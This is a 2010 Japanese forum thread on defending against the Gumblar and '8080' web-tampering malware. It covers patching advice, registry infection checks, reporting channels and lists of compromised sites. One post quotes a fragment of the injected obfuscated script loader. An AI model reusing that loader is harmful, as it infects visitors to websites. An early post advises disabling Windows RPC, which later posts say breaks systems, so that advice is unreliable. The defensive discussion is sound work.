10/01/19 10:41:55
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
URLリンク(get.adobe.com)
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
URLリンク(get.adobe.com)
URLリンク(www.adobe.com)
・Flash Playerのバージョン確認
URLリンク(www.adobe.com)
URLリンク(www.adobe.com)
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
URLリンク(www.adobe.com)
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
URLリンク(www.java.com)
・Javaのバージョン確認
URLリンク(www.java.com)
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
URLリンク(www.apple.com)
■ RealPlayerを更新 (使っていないならアンインストール)
URLリンク(jp.real.com)
3:名無しさん@お腹いっぱい。
10/01/19 10:43:19
【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
URLリンク(jvndb.jvn.jp)
・Secunia Personal Software Inspector (PSI)
URLリンク(secunia.com)
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
URLリンク(www.forest.impress.co.jp)
URLリンク(hide9999.web.fc2.com)
4:名無しさん@お腹いっぱい。
10/01/19 10:44:56
【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
URLリンク(blogs.technet.com)
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
URLリンク(itpro.nikkeibp.co.jp)
レジストリの修復 Windowsを使わずに修復してみる
URLリンク(pctrouble.lessismore.cc)
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
URLリンク(www.ahnlab.co.jp)
マカフィー(stinger.exe)
URLリンク(www.mcafee.com)
Kaspersky(KatesKiller.exe)
URLリンク(support.kaspersky.com)
【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
URLリンク(anubis.iseclab.org)
■ GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
5:名無しさん@お腹いっぱい。
10/01/19 10:47:09
【8080系ウイルスについて】
メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/
などから始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますがこちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃~今すぐ対策を
URLリンク(www.so-net.ne.jp)
■ 感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください
セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済
上記の登録情報を削除した上で
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
のファイルを削除すれば復旧しますが、亜種等で違うこともあるので
可能な限りクリーンインストール&サイト持ちは
安全なPCからのパスワードの変更を推奨します
6: ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄
10/01/19 10:49:01
iヽ、
ミ ヽヽ、
,,,ミ ),,,,\
‐- ...,,__ カチカチ / ,,;;;;;;;;;; "''-、
~""''' ‐- ...,,__ /,, ,,;;; ;;;;;;''''__,,_,.-'''"l、
____,,,,,,,,,,,, -------/●);;;; ,;;''' 彡 l ,!
⌒ヽ、 _,,-‐‐‐f," ;; ;;; '' ;;;;彡三;_/ '' 彡 ノ ,,l
ヽ、八 \`(,,,,,,,,,イ''''ー、,;;;;;;; ((,,,,,.. (●>, __/'';;;;!
ヽ`---ー‐‐―‐ン '''-l ( ,.,., ,;;,, '';;;;;;,,,,/
 ̄ ̄ ̄ ̄ ̄ l メ//l '';,,,;;'';; '';;; ';, '';:;/
"''- .._ | / /メ、|';,,,,,'''';;;;;;;;;;;;;; ン;ヽ
'''- .._ ____,,,,,,,,,,,,,,-''''' ;;;;;;;;;;;`;-;;;-;;;;-;;-; ;;; ;;;l"
/ , , "'''- .. f-'' ;; ;; '';;;;; ''' ;;;;;;;;;;;;;;;;;;;;;;;;;_ ;;;;;;;;;;;;;l
/ / / / // (⌒ ;; ;; '';;;;; ''' ;; ;;;;;;;;;;;;;; ;;;;;;;;;;;;;|
/ / / // `''''-、;;;;,,,;;;,,,;;;;;,,;;;;;;;;;; ;;;;;;;;;;; ,,,, ;;;;;;;;;;l
7:名無しさん@お腹いっぱい。
10/01/19 10:49:07
GENO(Gumblar)ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)~(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページなどに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
8: ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄
10/01/19 10:49:44
iヽ、
ミ ヽヽ、
,,,ミ ),,,,\
‐- ...,,__ カチカチ / ,,;;;;;;;;;; "''-、
~""''' ‐- ...,,__ /,, ,,;;; ;;;;;;''''__,,_,.-'''"l、
____,,,,,,,,,,,, -------/●);;;; ,;;''' 彡 l ,!
⌒ヽ、 _,,-‐‐‐f," ;; ;;; '' ;;;;彡三;_/ '' 彡 ノ ,,l
ヽ、八 \`(,,,,,,,,,イ''''ー、,;;;;;;; ((,,,,,.. (●>, __/'';;;;!
ヽ`---ー‐‐―‐ン '''-l ( ,.,., ,;;,, '';;;;;;,,,,/
 ̄ ̄ ̄ ̄ ̄ l メ//l '';,,,;;'';; '';;; ';, '';:;/
"''- .._ | / /メ、|';,,,,,'''';;;;;;;;;;;;;; ン;ヽ
'''- .._ ____,,,,,,,,,,,,,,-''''' ;;;;;;;;;;;`;-;;;-;;;;-;;-; ;;; ;;;l"
/ , , "'''- .. f-'' ;; ;; '';;;;; ''' ;;;;;;;;;;;;;;;;;;;;;;;;;_ ;;;;;;;;;;;;;l
/ / / / // (⌒ ;; ;; '';;;;; ''' ;; ;;;;;;;;;;;;;; ;;;;;;;;;;;;;|
/ / / // `''''-、;;;;,,,;;;,,,;;;;;,,;;;;;;;;;; ;;;;;;;;;;; ,,,, ;;;;;;;;;;l
9:名無しさん@お腹いっぱい。
10/01/19 10:50:51
危険ポートを閉じることでセキュリティを強化する。
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
URLリンク(www.google.com)
10:名無しさん@お腹いっぱい。
10/01/19 10:52:12
【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
11:名無しさん@お腹いっぱい。
10/01/19 10:54:02
*** テンプレ終了 ***
12:名無しさん@お腹いっぱい。
10/01/19 11:18:14
新スレはこちらへ
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
スレリンク(sec板)
13:あげ
10/01/28 21:06:06
>>12を訂正
スレリンク(sec板)
からの続きで使用して下さい。
14:名無しさん@お腹いっぱい。
10/01/28 21:11:50
>>5
>>10
最近の亜種には役に立ちそうもないが一応
【感染確認】
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
15:名無しさん@お腹いっぱい。
10/01/28 21:13:36
【改ざんWebサイトの届出先】
■ JPCERT コーディネーションセンター (JPCERT/CC)
URLリンク(www.jpcert.or.jp)
・Web サイト改ざんに関する情報提供のお願い
URLリンク(www.jpcert.or.jp)
・インシデントの届出
URLリンク(form.jpcert.or.jp)
・記入例
URLリンク(www.jpcert.or.jp)
■ Google Safe Browsing: Report a Malware Page
URLリンク(www.google.com)
16:名無しさん@お腹いっぱい。
10/01/28 21:14:42
【改ざんサイトの調査など】
■ チェッカーサイト
・Gumblar Checker 2
URLリンク(gumblarchecker.crz.jp)
・aguse
URLリンク(www.aguse.net)
・飛び先のチェック by ぴょん基地の友達
URLリンク(www.kakiko.com)
・WebGetter
URLリンク(rd.or.tp)
・Dan's View Source
URLリンク(www.dan.co.uk)
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
Gumblar Checker2=URLリンク(gumblarchecker.crz.jp)
aguse.net サイト情報検索=URLリンク(www.aguse.net)
飛び先のチェック=URLリンク(www.kakiko.com)
WebGetterでソースを見る=URLリンク(rd.or.tp)
WebGetterでタグを除去してソースを見る=URLリンク(rd.or.tp)
WebGetterでリンクを抽出する=URLリンク(rd.or.tp)
Dan's View Sourcelでソースを見る=URLリンク(www.dan.co.uk)
17:名無しさん@お腹いっぱい。
10/01/28 21:21:37
>>15の補足
メールで該当サイトに通報する時は
CCにJPCERT/CCのメアドも入れると二度手間が省けるよん
18:名無しさん@お腹いっぱい。
10/01/28 21:27:34
So-netセキュリティ通信
URLリンク(www.so-net.ne.jp)
執筆している会社(株式会社 現代フォーラム)
URLリンク(www.gendai-forum.jp)
19:名無しさん@お腹いっぱい。
10/01/28 21:31:37
直近の要点だけまとめてみた
----------
■Exceptionが「/*・・・*/」無しの「DEBUG」に絶賛進化中。
※最新型は前スレ925氏が「DEBUG」と命名。
■あばすと、かすぺ、農怒は「DEBUG」の検体提出済。
※他の提出状況はしらん(報告待ち中)
■検索ワード:".replace(/\(|#|@|&|\^|\$|\)|\!/ig,"
・やふー
URLリンク(search.yahoo.co.jp)
・えきさいと
URLリンク(www.excite.co.jp)
※Googleセンセイは捜索に向かない(やってみればわかる)
20:名無しさん@お腹いっぱい。
10/01/28 21:38:35
>>19
びんぐ
URLリンク(www.bing.com)
21:名無しさん@お腹いっぱい。
10/01/28 21:50:28
もう新種の出が早すぎて、どういう環境で感染するのは全く分からないな・・・
22:名無しさん@お腹いっぱい。
10/01/28 21:58:12
Googleだと日付が表示できるから検索できれば便利なんだけどな
23:名無しさん@お腹いっぱい。
10/01/28 21:59:03
★★★警告! 試すな危険★★★
>>9の2件は【ルータ】未導入の人用です。
前スレで、安易に手を出した初心者によるトラブルが続出しています。
(どうしても試したい人のための、症状例と救済レジストリ操作等)★保障なし★
URLリンク(blog.goo.ne.jp)
URLリンク(soudan1.biglobe.ne.jp)
URLリンク(weblabo.griffonworks.net)
24:名無しさん@お腹いっぱい。
10/01/28 22:18:39
今更質問だけど
8080系とか、GumblarにPCが感染すると具体的にどういう症状が出るの?
25:名無しさん@お腹いっぱい。
10/01/28 22:31:33
ボットネットに組み込まれ制御下におかれる。確定した症状は無い。
別な犯罪グループに切り売りされたり(CODE1が一部売られて別なコードになってる)
悪事の片棒担がされたりインチキセキュリティソフト売りつけられたり。
26:名無しさん@お腹いっぱい。
10/01/28 22:35:24
>>24
表面上何も異常がなくても
ある日突然警察がきてPC押収されるかもしれない
27:名無しさん@お腹いっぱい。
10/01/28 22:43:38
Adobe系、JRE等各ソフトが最新、アンチウイルスソフトもこまめに定義更新したらほぼ大丈夫かな?
28:名無しさん@お腹いっぱい。
10/01/28 22:46:51
>>27
大丈夫なんてとても言えない。
ブラウザのスクリプト切っておいてください。
あ、もちろんAdobeリーダーのJavascriptも切るんだよ。
29:名無しさん@お腹いっぱい。
10/01/28 22:54:32
レッツ!テキストブラウジング!
30:名無しさん@お腹いっぱい。
10/01/28 22:59:47
>>28
AdobeリーダーのJavascript、ブラウザでのPDF閲覧はチェック入れてない
IEだとJS関連が面倒そうだが信頼済みサイト機能使ってみるか
31:名無しさん@お腹いっぱい。
10/01/28 23:05:03
対策は、基本的には>>7でいいと思う
それ以上のプラスアルファの対策は、各人の好みで自分の気が済むようにやればいい
32:名無しさん@お腹いっぱい。
10/01/28 23:25:30
これってウイルス作ったやつが捕まらないと永遠に亜種が生まれるの?
それとも自動で亜種が生まれ続けているの?
33:名無しさん@お腹いっぱい。
10/01/28 23:46:27
>>27
OSの更新も忘れないでね!
34:名無しさん@お腹いっぱい。
10/01/28 23:47:20
>>32
作ってるやつが目的を達成するまで続く
自動でうまれることはない
35:名無しさん@お腹いっぱい。
10/01/29 00:03:43
>>34
じゃあ作ってるやつが捕まれば終息に向かうってことか
でも誰が作ったんだろうね?
出所から察するにロシアの悪質プログラマーなんだろうけど…
36:名無しさん@お腹いっぱい。
10/01/29 00:33:47
セキリュティソフトのベンダーがマッチポンプ・・・考え過ぎ?
37:名無しさん@お腹いっぱい。
10/01/29 00:35:12
ウイルスこわいでちゅ
38:名無しさん@お腹いっぱい。
10/01/29 00:35:49
任天堂がマジコン訴訟をとりさげるまで
39:名無しさん@お腹いっぱい。
10/01/29 00:42:41
ロシアのドメインを使ってるからって作成者もロシアとは限らんし、
似たようなのを別の誰かが作るかもしれないし
40:名無しさん@お腹いっぱい。
10/01/29 00:58:58
昔のコンピュータウイルスって可愛い動作のものも沢山あったよね
アウトルックでプレビューウインドウを開いているとで感染
載っているアドレスにスパムメールを送る位だったのに・・・
今はもうアドビば修正したのかも知れないけど
アドビの1ヶ月パッチ放置によって
アクロバット使用者が感染し、その人のブログ、HPが改竄され、
その改竄されたHPを踏むと、今度はそのユーザーブログが改竄され
個人情報まで抜かれるしまつ。
10年後にはどんな凶悪なウイルスが出てくるんだろ・・・
41:名無しさん@お腹いっぱい。
10/01/29 01:00:37
穴探すやつ、ウイルス作るやつ、配布するやつ、
ドメイン手配するやつ、botのタスク受けるやつ
分業化してると想う、今はbotクラウドの構築段階じゃないかな
42:名無しさん@お腹いっぱい。
10/01/29 01:10:47
昔のウィルスといえば普通にHDDのなかみ消したり
起動不能に陥らせてたりしてたとおもうが
5,6年前のは可愛いのおおかったがな
43:名無しさん@お腹いっぱい。
10/01/29 01:18:12
俺ネット歴浅いからよく知らんけど
昔はアルプス一万尺が延々と流れてくるウイルスなんてのもあったみたいだね
AIがとまらないって漫画で見たことある
なんか、最近のウイルスはその漫画のラスボスのゼロスパイダーとかみたいなのが
現実に出てきてるみたいで怖い
44:名無しさん@お腹いっぱい。
10/01/29 01:27:20
最近のウィルスはおそろしくなったな
45:名無しさん@お腹いっぱい。
10/01/29 01:28:17
スレリンク(sec板:452番)
再発 /DEBUG/
例の上映会とこ。。。
前スレの人、またつーほーおながいします。
whois上流のとこ届かなかったみたいぽ。
46:名無しさん@お腹いっぱい。
10/01/29 01:58:25
>>45
パスワードとか変えなかったのかよorz
47:名無しさん@お腹いっぱい。
10/01/29 02:24:50
他人が書き換えるのをいたずら書きぐらいに思ってるんじゃないかな
異常な状態にあることをわかってもらう必要がありそう
48:45
10/01/29 02:26:06
また届かないかもしれないけどwhois上流にめるはしてあります。
株式会社KDDIウェブコミュニケーションズの人ここ見てますかぁ~
49:名無しさん@お腹いっぱい。
10/01/29 04:35:23
【Gumblar】混ぜるな危険【8080系】
■Gumblar(たぶん消滅済)
2009/4~6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。
■Gumblar.x
2009/10~12に出現。
挿入するコードがGumblarのそれと同じだった為、
Gumblarの進化型(亜種?)と言われていた。
Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
※残骸が残っているサイトがあるが、現在は基本的に無害。
■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG)
Gumblar.xが消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険です。
8080系は、Gumblar用の対策方法には載ってない
「Java(JRE)」の脆弱性を突いているので、Gumblarと8080系を混同して
Gumblar用の対策を施し、「これで大丈夫(キリッ」とか言ってると、
踏んだ地雷が爆発→→→ \(^o^)/オワタ なんて事に(なるかも?)
50:名無しさん@お腹いっぱい。
10/01/29 05:42:02
>>49
乙age
51:名無しさん@お腹いっぱい。
10/01/29 06:13:45
SymantecがFlashPlayerを誤検出
URLリンク(isc.sans.org)
52:名無しさん@お腹いっぱい。
10/01/29 07:14:39
>>9とか載せんなよ ハゲ
53:名無しさん@お腹いっぱい。
10/01/29 07:28:41
>>9と>>49を差し替えたほうが・・・
54:名無しさん@お腹いっぱい。
10/01/29 07:33:53
スレたった日付をよく見ろハゲ
55:名無しさん@お腹いっぱい。
10/01/29 07:58:03
>>27
JREもセキュリティホールになってたのか・・・orz
油断できないな・・・
56:名無しさん@お腹いっぱい。
10/01/29 08:00:35
>>2-55はハゲ
57:名無しさん@お腹いっぱい。
10/01/29 08:02:31
>>1-56はクズ
58:名無しさん@お腹いっぱい。
10/01/29 08:04:55
関西の自主上映団体
URLリンク(www.rcsmovie.co)●jp/
こんなん↓書いてありますけど?
一部のセキュリティソフトにおいて、
当ホームページへのアクセス遮断や、
感染警告の表示などが発生している様です。
早急な対応を試みておりますが、
じゅうぶんご注意ください。
59:名無しさん@お腹いっぱい。
10/01/29 08:06:14
>>58
デジャビュ・・・いや既出だろそれ
60:名無しさん@お腹いっぱい。
10/01/29 09:11:39
てs
61:名無しさん@お腹いっぱい。
10/01/29 09:20:58
>>58
前スレ452と510で既出。
62:名無しさん@お腹いっぱい。
10/01/29 09:51:00
コピペですいません。
北斗の更新切らしてしまって、なんかヘンなサイトを踏んでしまい、
トロイの木馬警告が出ましたんで、もう一回踏んでみたら、
マカフィー無料スキャンで「JS/Redirector.cに感染しました」と出ました。
そこでウイルスキラーゼロを買ってきて、スキャンさせても「感染0」
もう一度マカフィー無料スキャンをやってみても「感染0」になります。
これは感染しているのでしょうか?
63:名無しさん@お腹いっぱい。
10/01/29 10:11:11
スレ違い
64:名無しさん@お腹いっぱい。
10/01/29 11:23:33
URLリンク(bb21.b2c-21)<)●com/z19z00703/
みたいな/z△z00○○○/ってページがz1zからz19zまではあるし
(19x1000ページはあるんだろうね)
URLリンク(dingo.hichigosan)<)●org/foreign-exchange-japan/
みたいに最後にjapanのつくページとか山ほどあるよね。
どうにもならんよね
65:名無しさん@お腹いっぱい。
10/01/29 11:27:27
>>9
前スレから転載
----------
669 :名無しさん@お腹いっぱい。:2010/01/25(月) 13:49:48
素人はRPCを絶対いじるな
URLリンク(blog.goo.ne.jp)
URLリンク(soudan1.biglobe.ne.jp)
URLリンク(weblabo.griffonworks.net)
----------
ハ,,..,,ハ
/;;・ω・;;ヽ
. (;( ^^^ );)
`'ー---‐´
トトロイ
(2010~)
66:名無しさん@お腹いっぱい。
10/01/29 11:32:18
玄人ならRPCを止めてもちゃんと動く
67:名無しさん@お腹いっぱい。
10/01/29 11:38:48
>>64
URLリンク(bb21.b2c-21)<)●com以下の階層のページ 31件
↓
/z19z00701
/z19z00703
/z19z00705
/z19z00707
/z19z00710
/danjiki/
/hair/
/bust/
/bland/
面倒だから、以下略とす
68:名無しさん@お腹いっぱい。
10/01/29 11:48:28
今なら admachiko で検索すればいっぱい引っかかるよ。
こーゆーのどーすればいーのさ
69:名無しさん@お腹いっぱい。
10/01/29 11:51:14
それgumblarや8080と関係なくね
70:名無しさん@お腹いっぱい。
10/01/29 11:53:01
>>69
ソースみてみ
71:名無しさん@お腹いっぱい。
10/01/29 11:54:57
>>68
DEBUGじゃない...
;document.write('<scr'+'ipt src=h'+'http://'+Xiabbjepv1.replace(/Widcfpac5ixzc/g, '8080')+'></scr'+'ipt>');} } catch(Xixc9uyr ) {}
URLリンク(apopo)●apparelarc-xml●org/z1z00712/
72:名無しさん@お腹いっぱい。
10/01/29 13:09:27
>>71
再改竄
park5●wakwak●com/~izushichi/mikura/index●html
ここは「.ru:Bxj118lelf/」になってる。
.ru:XXXXの部分は
何らかの法則、又はランダムで生成してるような希ガス
昨日のDEBUGは本当にDEBUGだったのか・・・
73:名無しさん@お腹いっぱい。
10/01/29 13:55:42
あーmegaidもDEBUGもランダムになっちまったか…
74:45
10/01/29 13:59:44
>>64,>>71
whoisみたら同じとこみたい、める一通しました。
>>72
あばばばば
75:名無しさん@お腹いっぱい。
10/01/29 14:29:46
すみません
以前に>>9を見てポート445を閉じてしまったのですが
元に戻す場合には「スタートアップ」の種類を何に変更すればいいのでしょうか?
76:名無しさん@お腹いっぱい。
10/01/29 14:37:06
うちはシステムになってるな
77:名無しさん@お腹いっぱい。
10/01/29 15:52:09
>>75
うちもシステムになっているよ@XP SP2
78:75
10/01/29 16:27:54
>>76>>77
どうもありがとうございます
自分のも確か最初はシステムだったなと思っていたので
システムにしてみます
79:名無しさん@お腹いっぱい。
10/01/29 16:35:50
>>49
8080系ってJREを利用してるの?
adobeの更新がどうのこうの話題になってたけど。
80:名無しさん@お腹いっぱい。
10/01/29 16:43:12
>>79
使う。Java6Update17未満だとやられる。
WindowsのもあるけどこれはWindowsUpdateで阻止できるので脅威ではない。
81:名無しさん@お腹いっぱい。
10/01/29 17:35:57
JREってアップデートしても古いの残ったままだけど、
古いの削除しないとヤバイ?
82:名無しさん@お腹いっぱい。
10/01/29 17:35:59
>>80
そこまで新しくなくても今のところは大丈夫
ダメなのは
JRE 6 Update 11未満
JRE 5.0 Update 17未満
JRE 1.4.2_19未満
あと8080系はクリスマス頃から未修整だったAdobe Readerの脆弱性を使うようになった。
ほかの攻撃内容は帰ってきたGumblar並みだったのに、
ここまでひどいことになったのはこの2つのおかげだと思う。
83:名無しさん@お腹いっぱい。
10/01/29 17:38:56
心配ならとりあえずJAVAの実行を切っとけばいい。
84:名無しさん@お腹いっぱい。
10/01/29 17:55:07
>>81
URLリンク(www.ccc.go.jp)
企業などで特定のバージョンのJREを必要とする場合はありますが、
それ以外の場合では旧バージョンをアンインストールすることをお薦めします
85:名無しさん@お腹いっぱい。
10/01/29 18:01:37
www.rcsmovie.co●jp/index.html
凸完了
86:名無しさん@お腹いっぱい。
10/01/29 18:02:59
注入されるコードは頻繁に変わってるけど本体を呼び出すコードは何の変化もなしか・・
87:名無しさん@お腹いっぱい。
10/01/29 18:05:56
ガンブラーなんてゴミ箱ポイポイのポイよ
88:名無しさん@お腹いっぱい。
10/01/29 18:08:56
「プログラムの追加と削除」リストにJava Runtime Environmentが無いんだけど
これは入ってないってことでいいの?
URLリンク(www.java.com)で確認したんだけど良く分からん
89:名無しさん@お腹いっぱい。
10/01/29 18:13:07
>>88
俺のところでは Java(TM) 6 Update 17 となってるな
90:名無しさん@お腹いっぱい。
10/01/29 18:16:14
今JAVA(TM)6 UPDATE 17とJ2SE RUNTIME ENVIRONMENT5.0
がインストールされてます、ADOBE製品はFLASHPLAYER10
しか使ってないんですが一応の対策はこれでOKですか?
ウイルスソフトはNIS2009使ってます
91:88
10/01/29 18:28:04
>>89
「プログラムの追加と削除」リストを名前順に並べて
I-O DATA
Microsoft (C++等四つほどあり)
NVIDIA(ドライバ)
となっています
Javaの文字は無いのでインストールされてないようです
>>7の他の対処法でJREだけやっていなかったのでとりあえず安心できます
ありがとうございました
92:名無しさん@お腹いっぱい。
10/01/29 18:28:07
Java は Update 18 が最新
バージョンチェックは↓でどうぞ
URLリンク(jvndb.jvn.jp)
93:88
10/01/29 18:30:24
×>>7の他の対処法で
○>>7の対処法で
94:へたれ発掘屋
10/01/29 18:31:08
【陥落サイト情報】
※名無し最新型は「.ru:X」と記す
沖縄情報ガイド(.ru:X)
URLリンク(www)<)●relax-living●net/bike11/
※トップページは絶賛崩壊中
にしてもGNU GPLって・・・orz
中古車情報の朝日オート(DEBUG)
URLリンク(horizon)<)●jtmetal●jp/data/index2●html
漢方 コバヤシ薬局(.ru:X、DEBUG)
URLリンク(www)●sbest-drug●com/
つーほヨロ・・
95:名無しさん@お腹いっぱい。
10/01/29 18:32:24
あまり詳しくないので質問。
>>2で最新版(Java(TM)6Update18)にすれば、
・「JREを使われる穴がふさがるよ」なのか
・「JREが新しくなって穴がふさがるよ」なのかどっちなんだろう…
こないだアップデートしてJava(TM)6Update18にしたが
Java (TM) SE Runtime Environment Update 1は特に変化がない…。
確認ページでも最新版がすでにあるといわれる…
JREはいらないなら削除してもいいのかなぁ
96:名無しさん@お腹いっぱい。
10/01/29 18:48:17
JAVA関係は一旦総てアンインスコ後に掃除してから最新版をインスコ汁
97:90
10/01/29 19:01:58
JAVA(TM)6 UPDATE 17とJ2SE RUNTIME ENVIRONMENT5.0の両方削除して
JAVA(TM)6 UPDATE 18入れました
98:名無しさん@お腹いっぱい。
10/01/29 19:02:31
>>72
>何らかの法則、又はランダムで生成してるような希ガス
さすが田宮さんw
99:名無しさん@お腹いっぱい。
10/01/29 19:17:00
>>94
コメント無しは固定だったmegaidとDEBUGが可変文字列に変わったようなものだから
ru:XよりDEBUG改とかにした方が特徴的に分かり易くないかな。
100:名無しさん@お腹いっぱい。
10/01/29 19:22:20
ロシア多いな
101:名無しさん@お腹いっぱい。
10/01/29 19:32:14
>>99
結局固定文字列は「8080」くらいしか残ってなかったり
102:45
10/01/29 19:42:06
>>94
沖縄情報
ジェイ・ティ・メタル
漢方 コバヤシ薬局
以上whoisよりめるぽしました。
> 崩壊中
ひょっとして管理者とクラッカーの上書き合戦だったりして。。。
103:名無しさん@お腹いっぱい。
10/01/29 20:12:51
連日のように新型が生まれてて恐ろしいな
104:名無しさん@お腹いっぱい。
10/01/29 20:23:06
誘導方法や突かれる脆弱性には変化がないのに新型というのはどうかな。
亜種や変種とした方が語弊がないと思う。
105:名無しさん@お腹いっぱい。
10/01/29 20:30:43
めんどくさいから「改良型」でいいんじゃないかな
106:名無しさん@お腹いっぱい。
10/01/29 20:41:24
鯖缶が怠慢なため
こんなことに...
管理用端末で余所のwebページ閲覧するなよ
毎日パス変えとけボケ
107:名無しさん@お腹いっぱい。
10/01/29 21:29:03
URLリンク(www)<)●jiwe●or●jp/Re-BeWeb/2009/spring/chapter04/index●html
URLリンク(www)<)●jiwe●or●jp/Re-BeWeb/2009/spring/chapter05/index●html
URLリンク(www)<)●jiwe●or●jp/Re-BeWeb/2009/spring/chapter03/index●html
URLリンク(www)<)●jiwe●or●jp/Re-BeWeb/2008/summer/chapter01/index●html
URLリンク(www)<)●jiwe●or●jp/Re-BeWeb/2008/summer/chapter02/index●html
URLリンク(www)<)●jiwe●or●jp/Re-BeWeb/2008/summer/chapter08/index●html
URLリンク(www)<)●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter01/index●html
URLリンク(www)<)●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter04/index●html
URLリンク(www)<)●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter05/index●html
